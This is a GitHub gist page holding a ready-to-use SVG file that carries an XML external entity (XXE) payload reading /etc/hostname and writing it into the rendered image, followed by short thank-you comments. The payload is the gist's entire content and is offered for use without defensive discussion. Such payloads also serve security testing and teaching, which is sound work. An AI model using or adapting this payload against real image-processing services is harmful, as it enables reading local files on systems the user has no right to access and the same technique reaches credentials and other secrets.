Skip to content

Instantly share code, notes, and snippets.

@jakekarnes42
Created August 13, 2019 23:44
Show Gist options
  • Save jakekarnes42/b879f913fd3ae071c11199b9bd7ba3a7 to your computer and use it in GitHub Desktop.
Save jakekarnes42/b879f913fd3ae071c11199b9bd7ba3a7 to your computer and use it in GitHub Desktop.
An SVG "image" that uses an XXE attack to embed the hostname file of whichever system processes it into the image itself
Display the source blob
Display the rendered blob
Raw
<?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]><svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-size="16" x="0" y="16">&xxe;</text></svg>
@0xSn4k3000
Copy link

Thx for this ...

@sha-16
Copy link

sha-16 commented Mar 27, 2023

Thankssss! Good contribution!

@romankis95
Copy link

very usefull, thank you

@czasec
Copy link

czasec commented Oct 28, 2023

awesome

]>&xxe;

<>

@momka1234
Copy link

__

@momka1234
Copy link

_**

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment